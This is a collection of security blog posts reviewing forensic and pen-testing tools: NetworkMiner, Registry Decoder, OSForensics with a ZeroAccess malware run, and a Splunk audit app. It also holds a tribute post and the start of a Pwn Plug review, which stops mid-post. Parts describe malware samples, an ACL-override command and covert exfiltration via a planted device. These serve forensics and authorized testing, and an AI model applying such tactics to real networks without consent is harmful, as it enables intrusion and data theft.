Quantcast
Channel: HolisticInfoSec™
Viewing all 134 articles
Browse latest View live

Tool review: NetworkMiner Professional 1.2

$
0
0
I've been slow in undertaking this review as NetworkMiner's Erik Hjelmvik sent me NetworkMiner Professional 1.1 when it was released and 1.2 is now available.
Seeing Richard Bejtlich's discussion of Pro 1.2 has served to get me off the schnide and is helpful as I will point you to his post as an ideal primer while I go into to a bit deeper detail as to some of NetworkMiner's power as well as what distinguishes Professional from the free edition.
I covered NetworkMiner in toolsmith in August 2008 back when it was version 0.84. Erik has accomplished all of his goals for improvement as identified in the article including reporting, faster parsing of large PCAP files (.735 MB/s at the command-line),  more protocols implemented, and PIPI (Port Independent Protocol Identification). NetworkMiner Professional 1.2 incorporates all of the above.
To exemplify NetworkMiner Professional's PIPI capabilities, I changed my lab web server port to 6667, then set NetworkMiner to grab a live capture while browsing to the reconfigured server.
Note: you need to Run as Administrator to grab the interface on Windows 7.
Sure, it's more likely that someone would be more likely to hide evil traffic over port 80 but you get the point. As Richard said, "PIPI has many security implications for discovery and (preferably) denial of covert channels, back doors, and other policy-violating channels."
Note as seen in Figure 1 that NetworkMiner Professional clearly differentiates HTTP traffic regardless of the fact that it traversed port 6667.

Figure 1
I was a bit surprised to note that the Hosts view as seen in Figure 1 did not identify that any data was pushed as cleartext although it unequivocally identified the admin/password combination I sent in both the Cleartext view and the Credentials view.
I used an 18.8MB PCAP from the Xplico sample set as it includes a plethora of protocols and carve-able content with which to test NetworkMiner Professional.
Exporting results to CSV for reporting is as easy as File --> Export to CSV and selecting output of your choosing. As seen in Figure 2 I opted for Messages as NetworkMiner Professional cleanly carved out an MSN to Yahoo email session (HTTPS, anyone?).

Figure 2
Geo IP localization is a real standout too. You'll see it in play as you explore host details in Hosts view as seen in Figure 3.
Figure 3
You may find host coloring useful too should you wish to tag hosts for easy identification later as seen in Figure 4.

Figure 4
Finally, I am most excited about NetworkMinerCLI for command-line scripting support. 
I ran a PCAP taken from a VM infected with Trojan-Downloader.Win32.Banload.MC through NetworkMinerCLI and was amply rewarded for my efforts...right after I excluded the output directory from AV detection.
Figure 5 shows the command executed at the prompt coupled with the resulting assembled files and CSVs populated to the output directory as seen via Windows Explorer.

Figure 5
The assembled files included all the malicious binaries disguised as JPGs as downloaded from the evil server. File carving network forensic analysis juju with easy CLI scripting. Bonus!

In closing, NetworkMiner Professional 1.2 is a mature, highly useful tool and well worthy of consideration for purchase by investigators and analysts tasked with NFAT activity. 
I'm glad to provide further feedback via email and recommend you reach out to Erik as well via info [at] netresec.com if you have questions.







toolsmith: Registry Decoder

$
0
0








Prerequisites
Binaries require no external dependencies; working from a source checkout requires Python 2.6.x or 2.7.x and additional third-party apps and libraries.

Merry Christmas:"Christmas is not a time nor a season, but a state of mind. To cherish peace and goodwill, to be plenteous in mercy, is to have the real spirit of Christmas.” -Calvin Coolidge

Introduction
Readers of the SANS Computer Forensics Blog or Harlan Carvey’s Windows Incident Response bloghave likely caught wind of Registry Decoder. Harlan even went so far as to say “sounds like development is really ripping along (no pun intended). If you do any analysis of Windows systems and you haven't looked at this tool as a resource, what's wrong with you?” When Registry Decoder was first released in September 2011, I spotted it via Team Cymru’s Dragon News Bytes mailing list and filed it away for future use. Then, in most fortuitous fashion, Andrew Case, one of the Volatility developers I’d reached out to for September’s Volatility column, contacted me regarding Registry Decoder in early November. Andrew co-develops Registry Decoder with Lodovico Marziale as part of Digital Forensic Solutions and kindly provided me with content for the remaining entirety of this introduction.

Registry Decoder is open source (GPL) and written completely in Python and is downloadable via Google Code projects. It was initially funded by the National Institute of Justice and now is funded by Digital Forensics Solutions.
Registry Decoder was devised to automate the acquisition, analysis, and reporting of registry contents. To accomplish this, there are actually two projects. The first is RegistryDecoder Live which allows for the safe acquisition of registry files from a live machine by forcing a system restore point, thus putting the currently active registry files into a read-only state in backup. It then reads these files from backup either in System Restore Points for XP or from the Volume Shadow Service on Windows Vista & Windows 7. As Registry Decoder Live acquires files, it creates a database that can then be imported into the second tool, Registry Decoder.
Registry Decoder can analyze registry files from a number of sources and then provide a number of GUI-driven analysis capabilities. The current version of the tool (1.1 as this is written) can import individual registry files, raw (dd) disk images, raw (dd) split images, Encase (E01) images, and databases from the live tool. Once evidence is imported and pre-processed, the investigator then has a number of analysis tools available and new evidence can be added to a case at any time.
Registry Decoder’s analysis capabilities include:
·         Browsing Hives (similar to Access Data’s Registry Viewer)
·         Hive Searching (more on this below)
·         Plugin System (similar to regripper)
·         Hive Differencing
·         Timelining based on last write time
·         Path Based Analysis
·         Automated reporting of all of the above
Registry Decoder automates all of this functionality for any number of registry hives and the reporting can handle exporting results from multiple hives and analysis types into one report.

Andrew’s favorite Registry Decoder use case is USBSTOR analysis. Almost every case involving investigating a specific employee requires determining which (if any) USB drives were in use.  To do this with Registry Decoder, all an investigator has to do is create a case with the disk images or hives acquired, run the USBSTOR plugin, and then export the results. After pre-processing is done, it takes mere minutes to have a report created with the device name, serial number, etc. of any devices connected. Also, since Registry Decoder pulls historical files from live machines and disk images (System Restore & Volume Shadow Service), this analysis can be run across hives going back months or years.
Similarly, while investigating data exfiltration between multiple employees of a company, Andrew needed to know if they shared USB drives. To make the determination he took the SYSTEM files from each machine, loaded them into Registry Decoder and then used the plugin differencing ability on the USBSTOR plugin. It immediately revealed what drives were shared between computers, including their serial number.  Another common use of the differencing feature is with the Servicesplugin as this quickly identifies malware if you difference your known good disk image vs. a disk image of a machine suspected to be infected.

Registry Decoder’s search feature is one of its strongest features. It allows you to search across any number of hives and filter by keys/values/names, last write time range, wildcard searching, and bulk searching with keyword files.
For a recent case, Andrew had to determine if a person was accessing files they shouldn’t have been looking at. They had a desktop and a laptop, both running XP and both with many System Restore Points. In less than 30 minutes with Registry Decoder, Andrew needed only load the disk images from the two machines into Registry Decoder, make a text file with all the search terms, and then search all the terms across all the hives in the case (including historical ones). This returned results that he then exported into one report and was finished.  Another useful search is noted when viewing the search results tab, right click on any result, and immediately jump into the Browseview positioned at that key.

Another good use case includes path-based analysis which allows you to determine if a registry path exists in any number of files. For whichever files it is present in, one can then export the path and optionally its key/value pairs. This is extremely useful in two situations:
1.       Determining if certain software is installed (P2P, cracked software, etc.), as you can simply search any of the paths that the program creates and then export its key/values inclusive of when and where the software was installed.
2.       During malware analysis as most malware writes to the registry. Searching across numerous suspect systems for the malware’s path allows investigators to immediately determine the extent of infection.

Registry Decoder’s roadmap includes more analysis plugins and added support for memory analysis (integrate with Volatility’s existing in-memory registry functionality).
The developers also want to add support for analyzing previously deleted keys and name/value pairs within hives. The library utilized for enumerating hives, reglookup, already supports this functionality so it is just a matter of integration.


Running the Registry Decoder online acquisition component

I ran regdecoderlive32 on a 32bit Windows XP SP3 virtual machine infected with Lurid and regdecoderlive64 on a Windows 7 SP1 64bit machine.
One note for regdecoderlive32 on Windows XP systems with drives formatted with NTFS. Even when running regdecoderlive32 with administrator privileges the hidden System Volume Information directory is protected with unique ACLs. To circumvent this issue, issue cacls "C:\System Volume Information" /E /G :F from a command prompt at the root of C: (this assumes the OS is installed on C:).
As seen in Figure 1, running regdecoderlive is as simple as executing and defining a few parameters including description, output directory (must be empty) and check boxes for acquisition of current and backup files.

Figure1: Registry Decoder Live
Once acquisition is complete, the results directory will be populated with registryfiles/acquire_files.dband related files. This results directory can (should) be written to portable storage mounted on the target system or a network share, which can then be consumed by Registry Decoder for offline analysis.

Running the Registry Decoder offline analysis component

Registry Decoder can consume individual registry files, raw (dd) disk images, and Encase (E01) images, including split images. Building a case is as easy as adding a case name and number, investigator, comments, and case directory. Adding evidence to a case after initial processing is created is quite simple; you’ll be prompted to add new evidence after choosing Start Case and opening an existing case.
I only tested Registry Decoder with the acquisition database acquired from a Lurid-infected Windows XP VM via Registry Decoder Live.
Initial processing can take some time depending on the number of restore points or volume shadows.
Once initial processing is complete however, Registry Decoder is nimble and effective.
I mimicked some of Andrew’s use cases in this analysis of a Lurid victim. From runtime analysis of the Lurid sample I had (md5: 84d24967cb5cbacf4052a3001692dd54) I knew a few key attributes to test Registry Decoder with. Services and registry keys created include WmdmPmSp. As the search functionality is a strong suit, I selected CORE from the current snapshot acquired and searched WmdmPmSp. Right-click search results and select Switch to File View then navigate to the Browser tab for key values, etc. as seen in Figure 2.

Figure 2: Registry Decoder search results
I made use of the timeline functionality and was amply rewarded. Imagine a scenario where have a ballpark time window for a malware compromise or unauthorized access. You can filter the timeline window accordingly and produce output that is compliant to the SleuthKit’s mactime format. It’s not human readable currently (next release) so read it in with Autopsy or TSK. Timeline gathering and results are combined in Figure 3. It clearly identified exactly when Lurid wrote to HKLM\SYSTEM\CONTROLSET001\SERVICES\WmdmPmSp.
Figure 3: Registry Decoder timeline results
I also tested USBSTOR (unrelated to Lurid) on both acquisitions (Windows 7 and Windows XP) and the results were accurate and immediate in both cases as seen Figure 4.

Figure 4: Registry Decoder USBSTOR results
Explore the Plugins options included with Registry Decoder, the possibilities are endless. SYSTEM will provide you a nice summary overview as you begin, IE Typed URLs is great for inappropriate browser use, Services with Perform Diff enabled is excellent for malware hunting, System Runs will give you instant gratification regarding what’s configured to run on startup, ACMRU queries the registry keys that have been typed into the Windows Search dialog box, and on and on and on. JBrilliant!

In Conclusion

I’m extremely excited about this tool and imagining its use at scale to be of incredible use for enterprise incident responders and forensic examiners. I’ve been chatting with Andrew at length while writing this and he continuously mentions pending features including some visualization options and the aforementioned Volatility interaction. I can’t wait; check out Registry Decoder out for yourself ASAP.
Merry Christmas!
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Andrew Case, Registry Decoder developer and project lead

Choose the 2011 Toolsmith Tool of the Year

$
0
0
Merry Christmas and Happy New Year!
It's that time again.
Please vote below to choose the best of 2011, the 2011 Toolsmith Tool of the Year.
We covered some outstanding information security-related tools in ISSA Journal's toolsmith during 2011; which one do you believe is the best?
I appreciate you taking the time to make your choice.
You can review all 2011 articles here for a refresher on any if the tools listed in the survey.
You can vote through January 31, 2012.
Results will be announced February 1, 2012.

toolsmith: ZeroAccess analysis with OSForensics

$
0
0



Prerequisites
Windows

Happy New Year:“A New Year's resolution is something that goes in one year and out the other.” - Author Unknown



Introduction
December is the time of year when I post the Toolsmith Tool of the Year survey for reader’s to vote on their favorite tool of the given year. Please do take a moment to vote. What’s nice is that I often receive inquiries from tool developers who would like consideration for coverage in toolsmith. David Wren, Managing Director, of PassMark Software caught me at just the right moment as I was topic hunting for this month’s column. PassMark, out of Sydney, Australia, has been known for benchmark and diagnostic tools but has recently dipped its tow in the digital forensics pool with OSForensics. I give PassMark props for snappy marketing. OSForensics, “Digital Investigation for a new era” coupled with the triumvirate of Discover, Identify, and Manage makes for a good pitch, but as always we need tools that do as they do, not as they say. So what can we expect from OSForensics? According to David, who provided me with prerequisite vendor/developer content, the pending 1.1 release of OSForensics expected in mid-January 2012 will include:
·         Inclusion of a tree view style file system browser (Windows Explorer replacement).
·         Indexing & searching of the contents of E-mail attachments. At the moment just the E-mail content and the file names of attachments are indexed.
·         Improvements to add search results to a case directly from search history (efficiency improvement)
·         Ability to add quick notes to a case. At the moment adding arbitrary notes is a 2 step process.
·         Improvements in the built-in image viewer. Better quality image scaling & more file properties.
·         Minor improvements in the way E-mails are exported
·         Significant speed improvements in the window's registry browser
·         A bug fix for handling of dates in Spanish language E-mails.
·         Some minor documentation changes

Existing features include disk imaging, disk image mounting, raw hex view of disk,  manual carving, a registry viewer, forensic copy of network files, testing & zeroing of external drives prior to imaging, file hashing, live memory dumping, detection of files with wrong extensions via signatures, case management, reporting, 64bit  support, and more.
The OSForensics website has an extensive FAQ as well excellent videos and tutorials.
Please note that there is a Free Edition and a Pro Edition. For this article I tested the 1.0 Pro version of OSForensics.

Integrating additional tools into OSForensics

One of the things I like most about OSForensics is the ability to plug in other tools. There’s a great tutorial for enhancing OSForensics with Harlan Carvey’s RegRipper that will give you a solid starting point for this activity. Friend and reader Jeff C. expressed interest in rootkit analysis this month so I’m going to use this opportunity to integrate GMER and RootkitRevealer into OSForensics.
As I ran OSForensics on a Windows XP system from a USB key, I copied GMER and RootkitRevealer to E:\OSForensics\AppData\SysInfoTools.
I then navigated to System Information in the OSForensics UI, selected Add List and created a Rootkit Analysis list, followed Add under Commands and added the command to execute GMER and RootkitRevealer as seen in Figure 1.
Figure 1: Rootkit Analysis tools added
Keep in mind, you can add any of your preferred tools to OSForensics and their execution as well as their output will be captured as part of OSForensics case management capabilities.

Running OSForensics

For ease of viewing, right-click the menu on the left side of the OSForensics UI and choose thin buttons as this will present all options without scrolling.
One note of interest before diving in: OSForensics allows installation on a base analysis system from which you can then Install to USB so as to run it from a USB key as part of your field kit as seen in Figure 2.

Figure 2: Install OSForensics to a USB key
Jeff, as part of his expressed interest in rootkit analysis, also provided me with a perfect sample with which to compromise my test system. Nomenclature for this little nugget includes Jorik and Sirefef but you may now it best as Zaccess or ZeroAccess. To read a truly in-depth study of ZeroAccess, check out Giuseppe Bonfa’s fine work in four parts over at InfosecResources, as well as a recent update from Pedro Bueno on the ISC Diary. ZeroAccess has been rolled into the BlackHole Exploit Kit and is often used in crimeware bundles for ad clicking.
This particular sample (MD5: 3E6963E23A65A38C5D565073816E6BDC) is VMWare-aware so I targeted my Windows XP SP 3 system running Windows Steady State and executed QuickTimeUpdate.exe(it only plays a real QuickTime update on TV).  
As with any tool of OSForensic’s ilk, I started the process by creating a case which is as easy clicking Start then Create Case. The OSForensics UI is insanely intuitive and simple; if you’re one of those who refuses to read manuals, FAQs, and/or tutorials you’ll still get underway in short order. With most forensics oriented multi-functional tools that include indexing I always make indexing my second process. Yep, it’s as easy as Create Index. I infected this system on 12/26/11 at 1630 hours so a great next step for me was to review Recent Activity to see what was noteworthy. Based on a date range-limited search under Recent Activity I noted a significant spike in events in the 1600 hour. I right-clicked on the resulting histogram for the hour of interest and selected Show these files. The result, as seen in Figure 3, shows all the cookies spawned when ZeroAccess tapped into all its preferred ad channels. All cookies in Figure 3, including those for switchadhub.com, demdex.com, and displayadfeed.com were created right on the heels of the infection at 1630 hours. These are services malware writers use to track clicks and campaign success.

Figure 3: ZeroAccess’ malicious click campaign evidence via OSForensics
I had not browsed to any websites and on this host would have done so via a browser other than Internet Explorer; as such this activity as written to C:\Documents and Settings\LocalService\LocalSettings\Temporary Internet Files\Content.IE5clearly occurred in the background.
I always take a network capture during malware runtime and the resulting PCAP acquired while analyzing this version of ZeroAccess included connections to a well-known malware redirection service at 67.201.62.*. Search "67.201.62" malwareand you’ll see what I mean.

I then opted to call GMER from OSForensics as discussed earlier during Integration. If you’re not familiar GMER is the defacto standard for rootkit detection. Once a GMER scan is complete, you can choose to dump detected modules as seen in Figure 4 via Dump module.

Figure 4: GMER bags ZeroAccess via OSForensics
I fed the resulting binary file to VirusTotal and was rewarded for my efforts with hits for Gen:Variant.Sirefef.38, a ZeroAccess variant.
OSForensics features a Memory Viewer from which you can conduct similar activity natively by selecting a given process (one you assume or have determined is malicious), select one of four dump options including Dump Process Memory Contents, then click Dump. The resulting .bin can be fed to VirusTotal or a similar service.
But alas, you will not have made the utmost use of OSForensics if you don’t capitalize on Hash Sets. I won’t get into great detail as to how to do so as again the tutorial videos are excellent. You will want to enable a given hash set by selecting it in the UI then clicking Make Active. One of the hash sets PassMark offers via download is a 124kb common Keyloggershash set. You can select a directory via File Name Search, then Search, then right-click a file of interest (or CTRL-A to select all) and choose Look Up in Hash Set. As none of the acquired binaries for ZeroAccess matched the current hash set, I chose to scan my Lurid (the APT) analysis folder to see what matches the hash set had for me. I used the Sorting menu in the lower right-hand corner of the UI and set it to In Hash Sets; the results are seen Figure 5.

Figure 5: Keylogger hashset checks
While OSForensics claimed to have matches, they were only for 0 byte files that all show up with the MD5 hash of D41D8CD98F00B204E9800998ECF8427E. I’ll test this further with a known keylogger and determine what a real match looks like. I don’t fault OSForensics for this as I likely don’t have a sample keylogger whose hash matched the hash set. Trying hash matching against known good system files worked admirably.

I didn’t even touch OSForensics password analysis capabilities but will also likely do so in a future blog post. Do check out that feature set via Passwordsfor yourself and share your feedback. Recognize that OSForensics integrates Rainbow Tables so as you can imagine, the possibilities are endless.
Don’t forget the expected disk image analysis capabilities coupled with file carving. I tested this briefly (and successfully) only to confirm what I consider a required and standard feature for tools of this nature.

In Conclusion

I’ll admit I had no expectations for OSForensics as I had no prior experience with it and to be quite candid, no awareness prior to David contacting me. I always assume some risk when choosing such a tool given that I could spend hours conducting research and analysis only to find the tool does not meet the standard for toolsmith discussion (can you say emergency topic change?”). Such was not the case with OSForensics. I was pleased with the results, disappointed I didn’t have more time to spend on it before writing about it here, but looking forward making much more use of it in the future. As always, let me know what you think, I’m hopeful you find it as intriguing as I have.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

David Wren, Managing Director, PassMark Software


STOP SOPA!

2011 Toolsmith Tool of the Year: OWASP ZAP

$
0
0


Congratulations to the OWASP ZAP team!
The Zed Attack Proxy is the 2011 Toolsmith Tool of the Year.
ZAP finished with 338 votes (36.5% of the total), slightly edging out Security Onion.
SO finished a strong second place with 328 votes (35.4%).
Volatility came in third with 152 (16.4%) and Armitage right on their heels in fourth with 148 votes (16%).

I am donating $50 to the OWASP ZAP project to honor this win.
I ask that those of you with the wherewithal and resources to do so please visit the project page and donate in any capacity you can.

Congratulations and thank you to all participants this year and I look forward to a strong 2012.










toolsmith: Splunk app - Windows Security Operation Center

$
0
0

Prerequisites
Windows 2003, 2008, 7

Introduction
As a volunteer handler for the SANS Internet Storm Center, I am privileged to work with some incredibly bright, highly capable information security professionals. As said individuals create new tools or update those they maintain I have the advantage of early awareness and access. Bojan Zdrnja’s Splunk app, Windows Security Operations Center (referred to as WSOC hereafter) is a perfect example. By the time you read this a new version should be available on Splunkbase.
Bojan bought me up to speed on his latest effort via email.
The latest version of WSOC contains bug fixes (mainly minor search tweaks) along with a couple of new dashboards:
1.       A dashboard for up-to-date servers with patches
2.       Directory Services dashboards
The Directory Services dashboards are very useful as they show changes to objects in AD including creations, deletions, and modifications. These views are excellent for auditors.
In the future Bojan plans to add support for other products normally found in Microsoft environments, including infrastructure elements such as DNS/DHCP, IIS, SQL server, and perhaps TMG. WSOC’s primary purpose is to cover all potential security views an auditor or information security personnel might want purview of; there’ll be no run-of-the-mill operational monitoring here ;-).
Bojan offered many favorite use cases. People are not always aware of what's going on in their Windows environments. In almost every implementation he’s encountered he found automated tools/services filling logs in abundance. As an example, when the tool tries to access a resource automatically, it generates an AD authentication failure event and then it successfully authenticates through NTLM. This causes logs to grow substantially. The same dashboards can be used to easily spot infected machines or brute force attacks on the network, thanks to Splunk's excellent visualization capabilities. WSOC includes a table that shows a distinct count of failed login attempts per username per machine, so if a machine is brute forcing, even if it's slow, you'll be able to see it.
Auditors are particularly fond of the user/group management dashboards. They produce ready evidence, in one view, of which users were added to which group. When coupled with change requests, yours becomes an organization that is then better prepared for audits.
The dashboard showing installed services supports this well too as any installed service should have an accompanied change request (see further discussion below).
Bojan wanted to stress the missing patches dashboard as extremely valuable. This information is collected from the local Windows Update agent on every server. Of course, in order for it to be accurate, the Windows Update agent must be able to connect to WSUS or Microsoft's update server, but assuming it can, results will populate nicely showing servers that have missing patches and those that are all up to date.

Windows Security Operation Center installation

You’ll need a Splunk installation to make use of WinSOC. I’ll assume you have some familiarity with Splunk and its installation. If not, ping me via russ at holisticinfosec dot org and I’ll send you copy of a detailed Splunk article I wrote for Admin magazine in June 2010. You can also make use of the extensive online Splunk documentation resources.  
A panoply of Splunk application goodness is available on the Splunkbase site, WSOC included. For the easiest installation method, from the Splunk UI, click App| Find More Apps…, then search Windows Security Operations Center followed by clicking the Install Free button. 
Alternatively if you’ve acquired the .tar.gz for the app you can, again via the Slunk UI navigate to App| Manage Apps… | Install app from file and select the app from the location you’ve downloaded it to. Installation is also possible from the Splunk CLI.
Once installed WSOC will present itself from the Splunk menu under App as Windows Security Operations Center. Once you’ve navigated to the WSOC app, options will include:
·         About
o   Includes top sending servers, top source types, and contributing Domain Controllers (if applicable)
·         Login Events
o   Includes Active Directory, NTLM, and RDP successful and failed attempts
·         Directory services
o   Access and changes
·         User management
o   User Account and Group Management
·         Change Control
o   Advanced Activity Monitor
o   Windows Installations and Patch Status Overviews
o   Process Tracking
o   Time Synchronization
·         Windows firewall
o   Configuration changes
o   Allowed and blocked connections
o   Allowed and blocked binds
·         Saved Searches               
o   Preconfigured queries, too plentiful to list
·         Search
o   Standard Splunk search UI

You’ve got to remember to set your audit and logging policies to be sure they capture the appropriate level of success and failure in order to be properly indexed by Splunk from the security event log. Recognize the profound differences between Window Server 2003 and 2008 with special attention to Event IDs. WSOC is largely optimized for Windows 2008/7 event types but can be tuned for older versions if you know how to manage Splunk app configurations and query parameters.
Remember too that you can configure Splunk as a light forwarder (CLI only) on target Windows servers and send all events to a core Splunk collector running WSOC, thus aggregating all events in one index and UI. Note the 500MB a day limitation on the free version of Splunk.

Using Windows Security Operations Center

I ran WSOC through its paces on a Windows Server 2003 virtual machine image that I literally had not touched in two years (prior snapshot: 9/11/09). With WSOC and Splunk installed I patched the VM and generated a number of different logon events via RDP and locally. I also made changes to users and groups as well as updated browsers, Flash, and Java.
WSOC smartly reported on all related activity.
Under Change Control | Windows Installation Overview I noted all installations that wrote to the security event log (the default WSOC monitored log source) as seen in Figure 1.

Figure 1: WSOC Windows installation details   
As configured out of the box, if an event is not written to the security event log WSOC will not pick it up. As Bojan said, this app is intended as a security auditor’s tool as opposed to an operational health tool.
The default search covers the last 7 days from query time but the chronology drop down menu offers a range from 15 minutes to All time.  Licensed versions of Splunk can also leverage real time reporting.
Process Tracking is also great view to monitor on critical servers. Unwelcome or unfamiliar processes may jump out at you particularly if you’ve baselined normal expectations for your systems.
I am currently not running Active Directory or a domain controller in my lab which left a lot of WSOC functionality testing off the table (Directory Services, etc.) but that should not preclude you from doing so. Via Local Users and Groups I added an evil user, deleted some users created during testing on the VM in 2009, and deleted a couple of non-essential groups. Evidence of the activity immediately presented itself via User management | User Account Management and Group Management as seen in Figure 2.

Figure 2: WSOC user account monitoring
It’s a tad unseemly for WSOC to label UI panes as Added Windows Domain accounts and Deleted Windows Domain accounts given that the activity was local account specific, but you get the idea.
If you drill into View results you’ll receive all the detail not immediately available in the preliminary app pane.
Figure 3 shows WSOC nabbing me for having created the user Ima, short for Ima Hacker. J

Figure 3: Ima Hacker bagged and tagged
I love the Saved Search feature and ran Windows – Server restarts for you as an example knowing I’d intentionally triggered one of those events.
Results are noted in Figure 4where you can see the fact that the reboot was spawned by Internet Explorer (Windows Update).

Figure 4: WSOC captures system restarts 
Lastly, the Advanced Activity Monitor, under Change control, offers search capacity via unique identifiers. In Figure 5, you’ll see all the New added services attributed to my user account.

Figure 5: WSOC shows added services 
I did some customization of the app to capture Windows Server 2003 Windows Firewall-related events but be aware that by default the app checks events 4946, 4947, 4948, 5156, 5157, 5158, and 5159 (Windows Server 2008 Event IDs). Enable Audit MPSSVC Rule-Level PolicyChange on Windows 7 and 2008 for this to capture Window Firewall events correctly. Windows 2003 Event IDs are a different event code hierarchy that is not covered by WSOC but is east enough to customize for if you’re still running 2003.
I imagine you can see the value in WSOC, particularly from an audit and awareness perspective. The nice thing about Splunk apps is they can be enhanced and built upon with relative ease. Bojan and team also offer a supported, licensed version so that’s an option for you as well.

In Conclusion

WSOC is slick, particularly for teams already making use of Splunk. Once (or if) you’re comfortable with Splunk, you’ll find that apps such as WSOC and others make it invaluable for centralized, correlated data.
Again, if you want to read deeper dives into the power of Splunk and apps, ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Bojan Zdrnja, project lead, INFIGO IS

A Tribute to Tareq

$
0
0
This past Sunday we lost an extraordinary human being.
Tareq Saade perished doing something he loved as his was an adventurous spirit. My heart breaks for his family and his girlfriend Cindy, and as profound as my own sadness is, I can't begin to imagine their grief. My most sincere condolences are theirs. Tareq's family has asked that you donate to Red Cross in his memory; one of the many ways he gave was as a Red Cross volunteer. West Seattle Blog's post regarding his impact on the community he embraced is also a kind remembrance.
Tareq was one of those rare people about whom I have only ever heard good (great) things said.
Kind, brilliant, smart, funny, bright, giving, sharing, engaging, the list is endless and only does partial justice to his character.
To my regret I really only knew Tareq in a professional capacity as part of the information security community at Microsoft. Yet even in that limited scope I can say that I am surely better for having known him. If ever I had a question of him (he was expert in malware analysis and threat intelligence) it was often mere minutes in which he replied and always with a passion for the subject. For his 29 years he was worldly and I always learned something from him given both his deep intellect and his profound willingness to share. It was not for Tareq to be didactic as much as it was to be a natural mentor, again beyond his years.
It was my distinct privilege to have written an article with him and shared the stage with him as we co-presented at a Seattle-area information security gathering two years ago.
Much of the research I have conducted in recent years is touched by his generosity as he often provided samples, captures, feedback, or simply interest. Tareq was an ally against the Internet's evil denizens and our community will long mourn him while continuing to serve in his honor.
I imagine amateur radio operators will listen for W7TJS and feel the loss in the silence.
I imagine those he climbed with, those he dove with, those he worked with, those he gave with, and those he lived with will miss Tareq always. Ours is a lesser world without him.
When I first met Tareq, so as to ensure correct pronunciation, I asked him how to properly say Saade.
With a smile he said to me "It's easy, just like 'sad day'."
That it is, my friend, that it is.

I grieve for you, Tareq, I salute you, and I will miss you. Godspeed.



toolsmith: Pen Testing with Pwn Plug

$
0
0


Prerequisites
4GB SD card (needed for installation)






Dedicated to the memory of Tareq Saade 1983-2012:
This flesh and bone 
Is just the way that we are tied in 
But there's no one home
I grieve for you –Peter Gabriel 

Introduction
As you likely know by now given toolsmith’s position at the back of the ISSA Journal, March’s theme is Advanced Threat Concepts and Cyberwarfare. Well, dear reader, for your pwntastic reading pleasure I have just the topic for you. The Pwn Plug can be considered an advanced threat and useful in tactics that certainly resemble cyberwarfare methodology. Of course, those of us in the penetration testing discipline would only ever use such a device to the benefit of our legally engaged targets.
A half year ago I read about the Pwn Plug when it was offered in partnership with SANS for students taking vLive versions of SEC560: Network Penetration Testing and Ethical Hacking or SEC660: Advanced Penetration Testing, Exploits, and Ethical Hacking. It seemed very intriguing, but I’d already taken the 560 track, and was immersed in other course work. Then a couple of months ago I read that Pwnie Express had released the Pwn Plug Community Edition and was even more intrigued but I had a few things I planned to purchase for the lab before adding a Sheevaplug to the collection.  
But alas, the small world clause kicked in, and Dave Porcello (grep) and Mark Hughes from Pwnie Express, along with Peter LaPlante emailed to ask if I’d like to review a Pwn Plug.
The answer to that which you, dear readers, know to be a rhetorical question goes without saying.
Here’s the caveat. For toolsmith I’ll only discuss offering that are free and/or open source. Pwn Plug Community Edition meets that standard, but the Pwnie Express team provided me with a Pwn Plug Elite for testing. As such, for this article, I will discuss only the features freely available in the CE to anyone who owns a Sheevaplug: “Pwn Plug Community Edition does not include the web-based Plug UI, 3G/GSM support, NAC/802.1x bypass.”
For those of you interested in a review of the remaining features exclusive to commercial versions, I’ll post it to my blog on the heels of this column’s publishing.
Dave provided me with a few insights including the Pwn Plug's most common use cases:
·         Remote, low-cost pen testing: penetration test customers save on travel expenses, service providers save on travel time
·         Penetration tests with a focus on physical security and social engineering
·         Data leakage/exfiltration testing: using a variety of covert channels, the Pwn Plug is able to tunnel through many IDS/IPS solutions and application-aware firewalls undetected
·         Information security training: the Pwn Plug touches on many facets of information security (physical, social & employee awareness, data leakage, etc.), thus making it a comprehensive (and fun!) learning tool

One of Pwnie Express’ favorite success stories comes from Jayson Street (The Forbidden Network) who was hired by a large bank to conduct a physical/social penetration test on ten bank branch offices. Armed with a Pwn Plug and a bit of social engineering finesse, Jayson was able to deploy a Pwn Plug to four out of four branch offices attempted against before the client decided to cut their losses and end the test early. In one instance, a branch manager actually directed Jayson to connect the Pwn Plug underneath his desk. Pwnie Express hopes the Pwn Plug helps illustrate how critical physical security and employee awareness are and Jayson’s efforts delivered exactly that to his enterprise client.
Adrian Crenshaw (Irongeek) has Jayson’s Derbycon 2011 presentation video posted on his site. It’s well worth your time to watch it.

In addition to the Pwn Plug there is also the Pwn Phone which is also capable of full-scale wireless penetration testing. Penetration testers and service providers often utilize the Pwn Phone for proposal meetings and demonstrations as the "wow factor" is high. As with Pwn Plug, if you already own or can acquire a Nokia N900 you can download the community edition of Pwn Phone and get after it right away.

PwnPlug compatibility is currently limited to Sheevaplug devices. There has been little demand so far for the Guruplug/Dreamplug form factors and the Guruplug hardware has a history of overheating while the Dreamplug is quite bulky and flashy. Bulky and flashy do not equate to good resources for physical & social testing. The development team is working on a trimmed down of Pwn Plug for the $25 Pogoplug. Even though it only offers about half the performance and capacity of the Sheeva, with a larger board, it is only $25.

Figure 1 is a picture taken of the Pwn Plug I was sent for testing. You can see what we mean by the importance of form factor. It’s barely bigger that a common wall wart and you can use the included cord or plug it in straight to the wall. Pwnie Express included a couple of sticker options for the Sheeva. I chose what looks to be a very typical bar code and manufacturer sticker that even has a PX part number. I chuckle every time I look at it.

Figure 1: Who, me?
With Sheevaplugs typically sporting a 1.2Ghz ARM processor, 512M SDRAM, and 512M NAND Flash configuration it’s recommended that you don’t treat the device like a work horse (no Fastttack, Autopwn, or password cracking) but it’s crazy good for maintaining access in stealth mode, reconnaissance, sniffing, exploitation, and pivoting off to other victim hosts. Figure you’ll find the 512M storage at about 70% of capacity after installation but adding SD storage means you can add software within reason. Pwn Plug is Ubuntu underneath so apt-get is still your friend.
The tool list for a device this small is impressive. Expect to find MSF3, dsniff, fasttrack, kismet, nikto, ptunnel, scapy and many others at you command, most of which can be called right from the prompt without changing directories.

Installation

To install Pwn Plug CE to a stock Sheevaplug download the JFFS2 and follow the instructions. No need to reinvent the wheel here.

Pwning with PwnPlug

To ensure full understanding for those who may not think in evil mode or conduct penetration testing activity, here’s a quick executive summary followed by the longer play:
